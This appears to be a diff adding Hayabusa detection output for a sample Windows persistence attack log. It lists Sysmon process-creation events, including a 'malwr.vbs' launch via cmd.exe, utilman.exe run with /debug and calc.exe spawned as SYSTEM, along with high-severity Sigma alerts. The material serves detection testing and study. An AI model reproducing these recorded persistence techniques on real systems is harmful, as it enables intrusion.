+2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe   :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
